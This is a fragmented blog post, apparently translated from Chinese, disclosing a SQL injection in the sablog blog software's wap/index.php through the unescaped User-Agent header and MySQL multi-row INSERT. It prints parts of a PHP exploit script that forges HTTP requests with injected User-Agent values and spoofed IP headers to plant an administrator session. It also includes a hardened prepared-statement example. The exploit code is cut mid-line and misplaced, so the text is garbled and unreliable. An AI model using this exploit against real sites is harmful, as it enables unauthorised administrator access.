
sa-blog 0day


http://www.gipsky.com/
Source: loveshell, citing jackal

First: the exploit targets PHP5, because $_SERVER variables are not subject to single-quote escaping, even when escaping is enabled.



The vulnerability is in the User-Agent header.



Second: multi-row insertion with INSERT INTO.



The statement being constructed in the text is:



insert INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity) VALUES ('$hash', '".$user['userid']."', '".$user['groupid']."', '$iprand','',1),('9c5b71e5',1,1,'211.43.206.202','9989581653', '$timestamp');



MySQL supports



insert into [admin] (name,pass) values ('qq','bb'),('aa','cc')



this kind of multi-row data insertion.



Access does not. sablog is a blog program written by domestic security researchers, but a small flaw in the code may allow administrator privileges to be obtained :)



The problem is around line 652 of wap/index.php.
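To make the defect concrete, here is an added example (not sablog's own code, and not from the article's author): the session INSERT pattern described above in its vulnerable form beside a hardened form using bound parameters. Table and column names follow the query quoted in the article; $pdo and $db_prefix are assumed to exist.

```php
<?php
// Added example, not sablog's code. $pdo (a PDO connection with
// PDO::ATTR_EMULATE_PREPARES => false) and $db_prefix (from config, not
// user-controlled) are assumed to be available to the caller.

// VULNERABLE: $_SERVER['HTTP_USER_AGENT'] is attacker-controlled and, unlike
// $_GET/$_POST, is never touched by magic_quotes_gpc, so a single quote in the
// header closes the string literal. Because MySQL accepts multi-row
// VALUES (...),(...), a second, fully attacker-chosen session row can be appended.
function insertSessionVulnerable(PDO $pdo, string $db_prefix, string $hash, array $user, string $ip, int $now): void
{
    $agent = $_SERVER['HTTP_USER_AGENT'] ?? '';   // raw header text, unescaped
    $sql = "INSERT INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity)"
         . " VALUES ('$hash', '{$user['userid']}', '{$user['groupid']}', '$ip', '$agent', $now)";
    $pdo->exec($sql);
}

// HARDENED: every request-derived value travels as a bound parameter, so header
// content can never change the statement's structure. Numeric columns are cast,
// and the agent string is truncated to a fixed width (255 assumed) so oversized
// input cannot reach the database either.
function insertSessionSafe(PDO $pdo, string $db_prefix, string $hash, array $user, string $ip, int $now): void
{
    $agent = substr($_SERVER['HTTP_USER_AGENT'] ?? '', 0, 255);
    $stmt = $pdo->prepare(
        "INSERT INTO {$db_prefix}sessions (hash,uid,groupid,ipaddress,agent,lastactivity)"
      . " VALUES (:hash, :uid, :groupid, :ip, :agent, :ts)"
    );
    $stmt->execute([
        ':hash'    => $hash,
        ':uid'     => (int)$user['userid'],
        ':groupid' => (int)$user['groupid'],
        ':ip'      => $ip,
        ':agent'   => $agent,
        ':ts'      => $now,
    ]);
}
```

The same rule applies to the other $_SERVER-sourced values the script sends (CLIENT_IP, X_FORWARDED-FOR): treat them as untrusted input, never as pre-escaped.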



------------

$hash = getuserhash($user['userid'], $user['username'], $user['password'], $user['logincount'] 1);

$DB->query("delete FROM {$db_prefix}sessions where uid='".$user['userid']."' OR lastactivity 3600http://www.loveshell.net/blog test test\r\n";

echo" ---------------------------------------------------------------- \r\n";



if(!$username||!$password) die;



echo" root@localhost:Post our content\r\n";



$str = 'username='.$username.'&password='.$password.'&action=login&do=login&';



$msg = myrequest($str,$url);

echo $msg;



if(strpos($msg,'登陆成功')!==false) echo" root@localhost:All Done!!! \r\n";

else echo" root@localhost:Login error!!! \r\n";

echo" ---------------------------------------------------------------- \r\n";

echo" Enjoy yourself.\r\n";

echo" ---------------------------------------------------------------- \r\n";



function myrequest($msg,$url,$type=2,$cookie=''){

//change type for post/get

global $sql;

$urls = initurl($url);

$iprand = rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);

$fp = @fsockopen($urls['host'], $urls['port'], $errno, $errstr, 3);

if($fp) {

if($type==1){

fputs($fp, "GET $urls[path]?$urls[query] HTTP/1.1\r\n");

fputs($fp, "Host: $urls[host]\r\n");

fputs($fp, "Accept: */*\r\n");

fputs($fp, "Referer: $urls[url]\r\n");

fputs($fp, "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n");

fputs($fp, "CLIENT_IP: $iprand\r\n");

fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");

fputs($fp, "Pragma: no-cache\r\n");

fputs($fp, "Cache-Control: no-cache\r\n");

fputs($fp, "Connection: Keep-Alive\r\n");

fputs($fp, "Cookie: $cookie\r\n\r\n");

}else{

fputs($fp, "POST $urls[path]?$urls[query] HTTP/1.1\r\n");

fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n");

fputs($fp, "Referer: $urls[url]\r\n");

fputs($fp, "Accept-Language: zh-cn\r\n");

fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");

// fputs($fp, "User-Agent: ',1),[1] {

$resp .= fread($fp,1024);

}

return $resp;

}



function initurl($url) {



$newurl = '';

$blanks = array('url'=>'');

$urls = $blanks;



if(strlen($url)

[Last modified by , on 2007-09-17 12:41:15]
Notes
  1. select concat(0x2f,groupid,0x2f,logincount) from angel_users limit 1),1,1,'211.43.206.208','123\r\n");

    fputs($fp, "User-Agent: ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653\r\n");

    fputs($fp, "CLIENT_IP: $iprand\r\n");

    fputs($fp, "X_FORWARDED-FOR: $iprand\r\n");

    fputs($fp, "Host: $urls[host]\r\n");

    fputs($fp, "Content-Length: ".strlen($msg)."\r\n");

    fputs($fp, "Connection: Keep-Alive\r\n");

    fputs($fp, "Cache-Control: no-cache\r\n");

    fputs($fp, "Cookie: $cookie\r\n\r\n");

    fputs($fp, $msg."\r\n");

    }

    }



    while($fp&&!feof($fp